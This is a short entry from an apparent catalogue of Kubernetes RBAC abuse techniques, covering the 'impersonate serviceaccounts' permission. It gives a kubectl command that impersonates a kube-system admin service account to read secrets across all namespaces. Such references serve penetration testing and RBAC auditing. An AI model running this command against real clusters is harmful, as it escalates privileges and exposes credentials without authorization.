can-i gtfo?

Kubernetes RBAC Abuse Collection

View on GitHub

impersonate serviceaccounts

Abuses

Privilege Escalation

Impersonate privileged service accounts to gain elevated cluster access

# Impersonate cluster admin service account
kubectl --as=system:serviceaccount:kube-system:admin get secrets --all-namespaces